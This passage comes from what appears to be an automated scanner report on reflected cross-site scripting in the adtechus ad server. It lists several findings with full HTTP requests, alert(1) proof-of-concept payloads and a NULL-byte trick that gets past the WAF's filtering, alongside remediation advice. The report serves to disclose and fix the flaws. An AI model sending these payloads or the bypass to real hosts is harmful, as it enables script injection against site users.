Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283052/0/170/ADTECH;loc=100;target=_blank;misc=1290348036818;rdclick=&3ac22'-alert(1)-'c021417b4a8=1 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19663

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('1283052'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5274/1283052/0/170/AdId=889431;BnId=35;itime=348843525;nodecode=yes;link=&3ac22'-alert(1)-'c021417b4a8=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE1283052+"'))";
AT_TARGET1283052="_self";
}
window.AT_ClickFn1283052= function (click)
{    cli
...[SNIP]...

2.148. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352254/0/154/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %003fdeb"-alert(1)-"22e367bb81c was submitted in the loc parameter. This input was echoed as 3fdeb"-alert(1)-"22e367bb81c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5294.1/1352254/0/154/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=494;misc=1290207940045;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3Bc0d42e6bca7c25a1%3B12c666437a4,0%3B%3B%3B1957494596,Z4UBACACDABhhFcAAAAAAG.XFwAAAAAAAABQAAoAAAAAAAEABQAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAApDdkZiwBAAAAAAAAAGJkY2Q1NDc4LWY0MzEtMTFkZi05OWIyLTAwMzA0OGQ3NWFkNAAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D607818%3BBnId%3D1%3Bitime%3D208030407%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,%003fdeb"-alert(1)-"22e367bb81c HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBACACDABhhFcAAAAAAG.XFwAAAAAAAABQAAoAAAAAAAEABQAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABS9kVnn-cvCSgGzuUZ9Ln6FR.ZVOVl3K56snPZAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D607818%3BBnId%3D1%3Bitime%3D208030407%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D160x600%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F965594%252F0%252F154%252FAdId%253D607818%253BBnId%253D1%253Bitime%253D208030407%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D786976%26_salt%3D2968669238%26X%3D5735503%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,bdcd5478-f431-11df-99b2-003048d75ad4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
odecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,%003fdeb"-alert(1)-"22e367bb81c") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlin
...[SNIP]...

2.149. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352254/0/154/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5f25'-alert(1)-'17a006cae34 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5294.1/1352254/0/154/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=494;misc=1290207940045;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3Bc0d42e6bca7c25a1%3B12c666437a4,0%3B%3B%3B1957494596,Z4UBACACDABhhFcAAAAAAG.XFwAAAAAAAABQAAoAAAAAAAEABQAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAApDdkZiwBAAAAAAAAAGJkY2Q1NDc4LWY0MzEtMTFkZi05OWIyLTAwMzA0OGQ3NWFkNAAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D607818%3BBnId%3D1%3Bitime%3D208030407%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,a5f25'-alert(1)-'17a006cae34 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBACACDABhhFcAAAAAAG.XFwAAAAAAAABQAAoAAAAAAAEABQAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABS9kVnn-cvCSgGzuUZ9Ln6FR.ZVOVl3K56snPZAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D607818%3BBnId%3D1%3Bitime%3D208030407%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D160x600%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F965594%252F0%252F154%252FAdId%253D607818%253BBnId%253D1%253Bitime%253D208030407%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D786976%26_salt%3D2968669238%26X%3D5735503%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,bdcd5478-f431-11df-99b2-003048d75ad4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,a5f25'-alert(1)-'17a006cae34')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE1352254+"'))";
AT_TARGET1352254="_self";
}
window.AT_ClickFn1352254= function (click)
{    click=(isN
...[SNIP]...

2.150. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352254/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6b4a'-alert(1)-'38701d47715 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5294.1/1352254/0/154/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=494;misc=1290207940045;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3Bc0d42e6bca7c25a1%3B12c666437a4,0%3B%3B%3B1957494596,Z4UBACACDABhhFcAAAAAAG.XFwAAAAAAAABQAAoAAAAAAAEABQAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAApDdkZiwBAAAAAAAAAGJkY2Q1NDc4LWY0MzEtMTFkZi05OWIyLTAwMzA0OGQ3NWFkNAAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D607818%3BBnId%3D1%3Bitime%3D208030407%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&a6b4a'-alert(1)-'38701d47715=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBACACDABhhFcAAAAAAG.XFwAAAAAAAABQAAoAAAAAAAEABQAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABS9kVnn-cvCSgGzuUZ9Ln6FR.ZVOVl3K56snPZAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D607818%3BBnId%3D1%3Bitime%3D208030407%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D160x600%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F965594%252F0%252F154%252FAdId%253D607818%253BBnId%253D1%253Bitime%253D208030407%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D786976%26_salt%3D2968669238%26X%3D5735503%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,bdcd5478-f431-11df-99b2-003048d75ad4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&a6b4a'-alert(1)-'38701d47715=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE1352254+"'))";
AT_TARGET1352254="_self";
}
window.AT_ClickFn1352254= function (click)
{    click=(i
...[SNIP]...

2.151. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352254/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %009e5b8"-alert(1)-"4a2fd5a3ebb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e5b8"-alert(1)-"4a2fd5a3ebb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5294.1/1352254/0/154/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=707;misc=1290207889864;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3Bc2ebe1bb9c45dd5b%3B12c666372f8,0%3B%3B%3B3971821727,Z4UBAC2JEwBhhFcAAAAAAG.XFwAAAAAAAAAwAAoAAAAAAAoABAAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAA93JjZiwBAAAAAAAAADlmN2ZiNTljLWY0MzEtMTFkZi04MWY2LTAwMzA0OGQ1NjVlMAAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D1014032%3BBnId%3D1%3Bitime%3D207979585%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%25281%2529_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&%009e5b8"-alert(1)-"4a2fd5a3ebb=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBAC2JEwBhhFcAAAAAAG.XFwAAAAAAAAAwAAoAAAAAAAoABAAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY81GnbecvCaT6HcTc3g-BmSPte4xZHng5TK59AAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D1014032%3BBnId%3D1%3Bitime%3D207979585%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%25281%2529_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D160x600%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F965594%252F0%252F154%252FAdId%253D1014032%253BBnId%253D1%253Bitime%253D207979585%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D1280301%26_salt%3D2393729907%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%252527%252527aee2d_____%252Ftitle__________script_____alert%2525281%252529_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,9f7fb59c-f431-11df-81f6-003048d565e0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%25281%2529_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&%009e5b8"-alert(1)-"4a2fd5a3ebb=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adl
...[SNIP]...

2.152. http://adserver.adtechus.com/addyn/3.0/5294.1/1352291/0/225/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352291/0/225/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9feaf"-alert(1)-"0bd34c25585 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5294.1/1352291/0/225/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=699;misc=1290207937235;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3Bf1be6aa0e4ccecd9%3B12c66642cb2,0%3B%3B%3B2726066490,Z4UBAC2JEwBPhFcAAAAAAG.XFwAAAAAAAABMAAYAAAAAAAoAAwAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAsixkZiwBAAAAAAAAAGJiYWQxOGE0LWY0MzEtMTFkZi04MjMzLTAwMzA0OGQ3MmNiZQAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965555%2F0%2F225%2FAdId%3D1014032%3BBnId%3D3%3Bitime%3D208027435%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,9feaf"-alert(1)-"0bd34c25585 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBAC2JEwBPhFcAAAAAAG.XFwAAAAAAAABMAAYAAAAAAAoAAwAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLIUUinOcvCb8kaJ0q61u4Sf3TvL9Pi80V0hKNAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965555%2F0%2F225%2FAdId%3D1014032%3BBnId%3D3%3Bitime%3D208027435%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D728x90%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F965555%252F0%252F225%252FAdId%253D1014032%253BBnId%253D3%253Bitime%253D208027435%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D1280301%26_salt%3D2784839641%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,bbad18a4-f431-11df-8233-003048d72cbe
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
